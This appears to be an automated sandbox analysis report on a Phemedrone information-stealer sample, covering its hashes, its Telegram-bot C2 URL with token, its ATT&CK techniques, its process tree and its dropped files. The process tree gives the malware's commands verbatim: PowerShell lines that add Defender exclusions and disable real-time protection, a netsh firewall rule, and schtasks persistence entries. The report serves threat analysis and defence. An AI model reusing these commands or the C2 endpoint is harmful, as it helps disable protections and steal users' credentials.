Overview

overview

10

Static

static

3

c45264dce1...2N.exe

windows7-x64

10

c45264dce1...2N.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 08:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe

  • Size

    768KB

  • MD5

    69c4993d6b9836514cacc5997e171af0

  • SHA1

    1140c1da02be1aee978bb942e2458b625c666884

  • SHA256

    c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2

  • SHA512

    bbab4efad27846b3032c22fca816cf8792ab9d8944aa38185a6a867ecbbefa39b0b10cab6e357f512413fb7bd7352d5a18a19f68eb946e039c3eda9db7721419

  • SSDEEP

    12288:/EkHbPv8rE9hHKCzt8wDvsgCB9HM1tUUEAWss9apo0:/lHUE98ct8iv2s0lHNe

Score
10/10
phemedronecredential_accessevasionexecutionpersistenceprivilege_escalationspywarestealertrojan

Malware Config

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot7266067820:AAGt1Lxc4KCTQDsEE5jnHkzETADxNAfSwWU/sendDocument

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
    evasiontrojan
  • Phemedrone

    An information and wallet stealer written in C#.

    stealerphemedrone
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Using powershell.exe command.

    execution
  • Event Triggered Execution: AppInit DLLs 1 TTPs

    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

    persistenceprivilege_escalation
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Drops file in Windows directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe
    "C:\Users\Admin\AppData\Local\Temp\c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2288
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dll.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2080
    • C:\Users\Admin\AppData\Local\Temp\dll.exe
      "C:\Users\Admin\AppData\Local\Temp\dll.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2112
      • C:\Windows\system32\CMD.exe
        "CMD" netsh advfirewall firewall add rule name="I6KX"gGn"Kc.">" dir=in action=allow program="C:\Users\Admin\WindowsHealth.exe" enable=yes & exit
        3⤵
          PID:2732
        • C:\Windows\system32\cmd.exe
          "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Setup.exe" /tr "C:\Users\Admin\WindowsHealth.exe" /RL HIGHEST & exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2268
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc minute /mo 1 /tn "Setup.exe" /tr "C:\Users\Admin\WindowsHealth.exe" /RL HIGHEST
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2508
        • C:\Windows\system32\cmd.exe
          "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Setup.exe" /tr "C:\Windows\Setup.exe" /RL HIGHEST & exit
          3⤵
            PID:2516
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc minute /mo 30 /tn "Setup.exe" /tr "C:\Windows\Setup.exe" /RL HIGHEST
              4⤵
              • Scheduled Task/Job: Scheduled Task
              PID:2756
          • C:\Users\Admin\WindowsHealth.exe
            "C:\Users\Admin\WindowsHealth.exe"
            3⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2568
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\phem.exe'
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1644
        • C:\Users\Admin\AppData\Local\Temp\phem.exe
          "C:\Users\Admin\AppData\Local\Temp\phem.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2748
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2748 -s 700
            3⤵
              PID:1524
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\wd.vbs'
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2864
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wd.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2556
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wd.vbs" /elevate
              3⤵
              • Modifies Windows Defender Real-time Protection settings
              • Suspicious use of WriteProcessMemory
              PID:1840
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2028
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2284
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1792
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1972
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2384
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1912
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2788
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2932
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2316
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2148
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1444

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Winlogon Helper DLL

        1
        T1547.004

        Create or Modify System Process

        1
        T1543

        Windows Service

        1
        T1543.003

        Event Triggered Execution

        1
        T1546

        AppInit DLLs

        1
        T1546.010

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Winlogon Helper DLL

        1
        T1547.004

        Create or Modify System Process

        1
        T1543

        Windows Service

        1
        T1543.003

        Event Triggered Execution

        1
        T1546

        AppInit DLLs

        1
        T1546.010

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Defense Evasion

        Impair Defenses

        1
        T1562

        Disable or Modify Tools

        1
        T1562.001

        Modify Registry

        2
        T1112

        Credential Access

        Credentials from Password Stores

        1
        T1555

        Credentials from Web Browsers

        1
        T1555.003

        Unsecured Credentials

        3
        T1552

        Credentials In Files

        3
        T1552.001

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        1
        T1082

        Lateral Movement

        Collection

        Data from Local System

        2
        T1005

        Command and Control

        Exfiltration

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\dll.exe
          Filesize

          494KB

          MD5

          8df36558e2243aebb32c2f000f6c3004

          SHA1

          cdadf26e175a7c5c2f0733e922b20a3ed9e40b7c

          SHA256

          6416b46a1ef1c7f430578d925ba79755c44587de14fe25f13e3d907c2adab47e

          SHA512

          cd458956d0a2d7e84682735f815ec9ee3522b23d959870b9b12f7b780fac5a881c350b1ec7e0edd14b0b89219877c5eda7bdd5e75c613478cad3ccf3a85fb42b

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\phem.exe
          Filesize

          121KB

          MD5

          da35d4754d59730768427d275dadfa76

          SHA1

          2cc27a5fa85d0c5a8faa9874d6cb45b472dd1ac8

          SHA256

          cbf36379349e8bfe52ce74ee151322333161142acb9f7b9434e2acaa6217755f

          SHA512

          c031ffdaa7624b71039810cca9cc045ddd84e570bb44ad211d6f9b5cc12676b74ce515c326cdf1323ed586e60cdb29806d603b9c9d503f31130c84551285ed0e

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\wd.vbs
          Filesize

          1KB

          MD5

          f95be7e4eb1d1c7114c8daccb3ad6c63

          SHA1

          e0605fc6729fdfce938f5dfc07e2bcf11df22301

          SHA256

          86b3c33e6b71fe3907bc8c21b8ce311ff375d215d0a4924eba3c5f32068fe6e1

          SHA512

          58998140cdeb52047f2dc762598a0c13535bdfa81145ac4e394d6f7bf3ff7e0766eb375da140a8d3a784c6460b4cdd22d09bcb135ea8fa4d06733700783acc84

          Download Submit
        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
          Filesize

          7KB

          MD5

          385a15b28773f375b4d6721fe024de8a

          SHA1

          538750d8ee7505ce2e6b50a66b77fb1eadfa8fba

          SHA256

          cc698e39918c9f60e072ee8ebac1719790697ccb14df67640743cc69cfb0cff9

          SHA512

          ee1fd9e5381cddf20fede0424440fd8872ec23df09740c61b03fa732ff83b3044ed57fc85b766b99883591189b1970cac216048ea1e16837679434cc366a636f

          Download Submit
        • C:\Windows\xdwd.dll
          Filesize

          136KB

          MD5

          16e5a492c9c6ae34c59683be9c51fa31

          SHA1

          97031b41f5c56f371c28ae0d62a2df7d585adaba

          SHA256

          35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

          SHA512

          20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

          Download Submit
        • \??\PIPE\srvsvc
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

          Download Submit
        • memory/1644-23-0x0000000002810000-0x0000000002818000-memory.dmp
          Filesize

          32KB

          Download
        • memory/1644-22-0x000000001B630000-0x000000001B912000-memory.dmp
          Filesize

          2.9MB

          Download
        • memory/2028-50-0x0000000001E10000-0x0000000001E18000-memory.dmp
          Filesize

          32KB

          Download
        • memory/2080-7-0x000000001B4E0000-0x000000001B7C2000-memory.dmp
          Filesize

          2.9MB

          Download
        • memory/2080-8-0x0000000001E80000-0x0000000001E88000-memory.dmp
          Filesize

          32KB

          Download
        • memory/2080-6-0x00000000028F0000-0x0000000002970000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2112-16-0x000000013F910000-0x000000013F990000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2288-43-0x000000001B6C0000-0x000000001B6D0000-memory.dmp
          Filesize

          64KB

          Download
        • memory/2288-0-0x000007FEF5CF3000-0x000007FEF5CF4000-memory.dmp
          Filesize

          4KB

          Download
        • memory/2288-1-0x00000000012A0000-0x0000000001364000-memory.dmp
          Filesize

          784KB

          Download
        • memory/2568-150-0x000000013F480000-0x000000013F500000-memory.dmp
          Filesize

          512KB

          Download
        • memory/2568-154-0x000007FEF27E0000-0x000007FEF2802000-memory.dmp
          Filesize

          136KB

          Download
        • memory/2568-152-0x000007FEF27E0000-0x000007FEF2802000-memory.dmp
          Filesize

          136KB

          Download
        • memory/2748-30-0x0000000000FD0000-0x0000000000FF4000-memory.dmp
          Filesize

          144KB

          Download
        • memory/2864-36-0x0000000002870000-0x0000000002878000-memory.dmp
          Filesize

          32KB

          Download